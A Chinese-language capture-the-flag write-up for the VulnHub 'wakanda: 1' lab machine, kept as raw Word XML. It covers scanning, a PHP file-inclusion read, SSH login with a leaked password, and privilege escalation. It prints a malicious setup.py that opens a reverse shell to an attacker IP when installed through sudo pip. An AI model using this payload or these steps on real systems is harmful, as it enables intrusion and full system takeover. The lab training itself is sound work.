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ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="005990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="005990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.vulnhub.com/entry/wakanda-1,251/" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="005990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r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5990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>wakanda: 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="005990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>靶机练习实践报告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00" w:lineRule="atLeast"/>
        <w:ind w:left="16" w:leftChars="0" w:right="0" w:rightChars="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>下载地址: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300" w:lineRule="atLeast"/>
        <w:ind w:left="376" w:right="0" w:hanging="360"/>
      </w:pP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instrText xml:space="preserve"> HYPERLINK "https://drive.google.com/file/d/1aPVQb8HZa4peG1B2DV9-QMYeOuDAgMX6/view?usp=drive_web" </w:instrText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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/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t>https://drive.google.com/file/d/1aPVQb8HZa4peG1B2DV9-QMYeOuDAgMX6/view?usp=drive_web</w:t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300" w:lineRule="atLeast"/>
        <w:ind w:left="376" w:right="0" w:hanging="360"/>
      </w:pP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instrText xml:space="preserve"> HYPERLINK "https://download.vulnhub.com/wakanda/wakanda-1.ova" </w:instrText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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/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t>https://download.vulnhub.com/wakanda/wakanda-1.ova</w:t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0" w:afterAutospacing="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="376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7F7F7"/>
        </w:rPr>
        <w:t> </w:t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instrText xml:space="preserve"> HYPERLINK "https://download.vulnhub.com/wakanda/wakanda-1.ova.torrent" </w:instrText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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/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t>https://download.vulnhub.com/wakanda/wakanda-1.ova.torrent</w:t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7F7F7"/>
        </w:rPr>
        <w:t>     (</w:t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instrText xml:space="preserve"> HYPERLINK "magnet:?xt=urn:btih:8BDBA13617D16CA38CDE39475D5B1A759BD4DDF0&amp;dn=wakanda-1.ova&amp;tr=http://tracker.vulnhub.com:6969/announce&amp;tr=udp://tracker.vulnhub.com:6969/announce&amp;tr=udp://tracker.openbittorrent.com:80/announce&amp;tr=udp://tracker.publicbt.com:80/announce&amp;tr=udp://tracker.istole.it:6969" </w:instrText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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/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t> Magnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="005990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7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1"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>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Flags: There are three flags (flag1.txt, flag2.txt, root.txt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Hint: Follow your intuitions ... and enumerate!</w:t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安装靶机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靶机是.ova文件，需要用VirtualBox打开，但我习惯于使用VMWare,因此修改靶机文件，使其适用于VMWare打开。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解压ova文件，得到.ovf文件和.vmdk文件。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768215" cy="334010"/>
            <wp:effectExtent l="0" t="0" r="1333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8215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用记事本打开.ovf文件并修改“&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>vssd:VirtualSystemType&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”为自己的VMWare版本，此处我用的是是vmx-15.5.1。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注意，改完以后导入VMWare仍旧提示磁盘错误，我又修改了.ovf中磁盘容量。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96790" cy="716915"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6985"/>
            <wp:docPr id="3" name="图片 3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679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default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="宋体" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="宋体" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>夺旗步骤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第一步：IP扫描，端口扫描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83455" cy="1261745"/>
            <wp:effectExtent l="0" t="0" r="17145" b="14605"/>
            <wp:docPr id="4" name="图片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3455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56785" cy="3435985"/>
            <wp:effectExtent l="0" t="0" r="5715" b="12065"/>
            <wp:docPr id="7" name="图片 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678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靶机的IP地址为192.168.198.132，靶机开放了端口80，111，3333，42665。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目录遍历IP地址，未发现有用信息，继续进行目录爆破，发现几个目录。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89170" cy="3970655"/>
            <wp:effectExtent l="0" t="0" r="11430" b="10795"/>
            <wp:docPr id="8" name="图片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917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逐个访问上述地址，什么信息都没有，至少提示后台很肯能是php开发的。访问80端口，打开主页面并查看源码。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64405" cy="1153795"/>
            <wp:effectExtent l="0" t="0" r="17145" b="8255"/>
            <wp:docPr id="9" name="图片 9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4405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切换语言，有没有可能存在本地文件包含，尝试通过该接口读取index.php（上一步发现的地址）。为什么尝试index.php而不是其他文件？因为他是脚本文件，可能泄露某些逻辑。此处我本来尝试的是resource=index.php，一直失败，后面偶然删掉后缀，竟然成功了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66640" cy="833120"/>
            <wp:effectExtent l="0" t="0" r="10160" b="5080"/>
            <wp:docPr id="10" name="图片 1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解码的得到index.php内容。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82110" cy="1421765"/>
            <wp:effectExtent l="0" t="0" r="8890" b="6985"/>
            <wp:docPr id="12" name="图片 1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211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该本地文件包含漏洞逐个读取之前步骤中发现的文件内容，什么都没有。Index.php中泄露了一个密码，rpc服务和ssh服务可能需要。上网搜索了许多nfs(rpc）的渗透手段，都没什么效果。试试ssh，枚举ssh用户名，并逐个用上述密码尝试，得到一个口令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mamadou:Niamey4Ever227!!!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”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4556760"/>
            <wp:effectExtent l="0" t="0" r="7620" b="15240"/>
            <wp:docPr id="13" name="图片 13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登陆后得到一个python环境，直接读取目录下的flag1.txt。进一步查看靶机上其他信息，发现再devops目录下有个flag.txt,但是没有权限读取，需要获取devops用户或developer用户组成员的权限。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10175" cy="1590675"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="14" name="图片 14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继续查看其他文件，发现一个隐藏文件python文件，且属主是devops。在里面写一个反弹shell，然后执行该python文件。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90745" cy="2138680"/>
            <wp:effectExtent l="0" t="0" r="14605" b="13970"/>
            <wp:docPr id="15" name="图片 15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0745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我们再kali中监听1234端口，获取一个devops用户的shell，同时获取到flag2.txt。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81550" cy="1735455"/>
            <wp:effectExtent l="0" t="0" r="0" b="17145"/>
            <wp:docPr id="16" name="图片 16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根据题目提示,root下还有一个flag,但是需要root提权。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首先考虑系统漏洞提权，尝试了多种方法，均失败；然后尝试suid提权，未发现可利用的点；最后尝试sudo提权，分别用mamadou和devops用户的shell查看sudo -l，发现devops下pip命令可以无密码使用sudo。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79340" cy="1216660"/>
            <wp:effectExtent l="0" t="0" r="16510" b="2540"/>
            <wp:docPr id="17" name="图片 17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934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参考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"https://blog.csdn.net/weixin_39219503/article/details/103643446"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https://blog.csdn.net/weixin_39219503/article/details/103643446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内容提权，先将setup.py上传到靶机目录下，然后执行，即可获得root权限的shell。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9865" cy="1167130"/>
            <wp:effectExtent l="0" t="0" r="6985" b="13970"/>
            <wp:docPr id="18" name="图片 18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setup.py的内容如下所示：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from setuptools import setup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from setuptools.command.install import install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import os, socket, subprocess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 CustomInstall(install):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def run(self):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install.run(self)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s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)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s.connect(("192.168.25.128",4321))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os.dup2(s.fileno(),0)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os.dup2(s.fileno(),1)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os.dup2(s.fileno(),2)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p=subprocess.call(["/bin/sh","-i"])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/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN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setup(name='FakePip',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version='0.0.1',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description='Reverse shell',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url='xx.xx.xx.xx',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author='nathan',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author_email='xx@xx',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license='MIT',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zip_safe=False,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cmdclass={'install': CustomInstall})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3865880"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1270"/>
            <wp:docPr id="19" name="图片 19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获得root下的flag。</w:t>
      </w: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1.熟练使用</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>多种提权方法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" w:afterAutospacing="0" w:line="23" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体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eastAsia" w:eastAsiaTheme="minor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EA307FA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FEA307F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50DDF775"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="50DDF77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A4A63"/>
    <w:rsid w:val="046551C7"/>
    <w:rsid w:val="049C4E68"/>
    <w:rsid w:val="04C138A2"/>
    <w:rsid w:val="059036CB"/>
    <w:rsid w:val="05EC2583"/>
    <w:rsid w:val="06A05307"/>
    <w:rsid w:val="07690480"/>
    <w:rsid w:val="0A125A09"/>
    <w:rsid w:val="0A2C3296"/>
    <w:rsid w:val="0AB15B9A"/>
    <w:rsid w:val="0BFB12CA"/>
    <w:rsid w:val="0C17611E"/>
    <w:rsid w:val="0D40757B"/>
    <w:rsid w:val="0D505D30"/>
    <w:rsid w:val="0FA77346"/>
    <w:rsid w:val="11D36983"/>
    <w:rsid w:val="13567FB7"/>
    <w:rsid w:val="13702390"/>
    <w:rsid w:val="158E67B6"/>
    <w:rsid w:val="17292819"/>
    <w:rsid w:val="177C6D25"/>
    <w:rsid w:val="1B415902"/>
    <w:rsid w:val="1B683278"/>
    <w:rsid w:val="1C302214"/>
    <w:rsid w:val="1D546DC6"/>
    <w:rsid w:val="1E5A0F48"/>
    <w:rsid w:val="1F4C11BA"/>
    <w:rsid w:val="235B3777"/>
    <w:rsid w:val="245C0E51"/>
    <w:rsid w:val="249F5FCB"/>
    <w:rsid w:val="261C4665"/>
    <w:rsid w:val="282E012B"/>
    <w:rsid w:val="28E80956"/>
    <w:rsid w:val="292F39A1"/>
    <w:rsid w:val="2F030055"/>
    <w:rsid w:val="2F2D1C4E"/>
    <w:rsid w:val="2FA84349"/>
    <w:rsid w:val="2FBB44B1"/>
    <w:rsid w:val="3180469B"/>
    <w:rsid w:val="327613F5"/>
    <w:rsid w:val="33BD5595"/>
    <w:rsid w:val="33C47375"/>
    <w:rsid w:val="34B466FB"/>
    <w:rsid w:val="355876EA"/>
    <w:rsid w:val="356B253E"/>
    <w:rsid w:val="361B76FC"/>
    <w:rsid w:val="38301389"/>
    <w:rsid w:val="396D2E5D"/>
    <w:rsid w:val="3B913FCD"/>
    <w:rsid w:val="3C320D8B"/>
    <w:rsid w:val="3C623342"/>
    <w:rsid w:val="3C996BBC"/>
    <w:rsid w:val="3D42330D"/>
    <w:rsid w:val="3D4769D2"/>
    <w:rsid w:val="400E2811"/>
    <w:rsid w:val="40E9118D"/>
    <w:rsid w:val="43DB1BA6"/>
    <w:rsid w:val="43E10435"/>
    <w:rsid w:val="44C459F5"/>
    <w:rsid w:val="44D14097"/>
    <w:rsid w:val="45133F6E"/>
    <w:rsid w:val="46683546"/>
    <w:rsid w:val="47B97B9E"/>
    <w:rsid w:val="4A4F4225"/>
    <w:rsid w:val="4BCB58A0"/>
    <w:rsid w:val="4C7C15E0"/>
    <w:rsid w:val="4EBA5E5E"/>
    <w:rsid w:val="4F7D43E0"/>
    <w:rsid w:val="50174D8B"/>
    <w:rsid w:val="51C77853"/>
    <w:rsid w:val="525E1358"/>
    <w:rsid w:val="54206C63"/>
    <w:rsid w:val="548D35A8"/>
    <w:rsid w:val="5927407C"/>
    <w:rsid w:val="5A7E3F17"/>
    <w:rsid w:val="5B684AC0"/>
    <w:rsid w:val="5C854588"/>
    <w:rsid w:val="61363672"/>
    <w:rsid w:val="61962989"/>
    <w:rsid w:val="63350845"/>
    <w:rsid w:val="6394516E"/>
    <w:rsid w:val="63C1137A"/>
    <w:rsid w:val="63EA0C2C"/>
    <w:rsid w:val="65C205C6"/>
    <w:rsid w:val="66EE652A"/>
    <w:rsid w:val="6A1A4FA6"/>
    <w:rsid w:val="6C883600"/>
    <w:rsid w:val="6D0C21C8"/>
    <w:rsid w:val="6FF83EF9"/>
    <w:rsid w:val="70496C75"/>
    <w:rsid w:val="71C5519E"/>
    <w:rsid w:val="73BF7ECC"/>
    <w:rsid w:val="744271C5"/>
    <w:rsid w:val="747F4827"/>
    <w:rsid w:val="774D285C"/>
    <w:rsid w:val="783547B9"/>
    <w:rsid w:val="788205D1"/>
    <w:rsid w:val="78B8103E"/>
    <w:rsid w:val="7A392667"/>
    <w:rsid w:val="7A6053C5"/>
    <w:rsid w:val="7A902819"/>
    <w:rsid w:val="7A9C4485"/>
    <w:rsid w:val="7D563031"/>
    <w:rsid w:val="7DCB65E2"/>
    <w:rsid w:val="7E0F3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violet&amp;partain</dc:creator>
  <cp:lastModifiedBy>violet&amp;partain</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-02T03:04:33Z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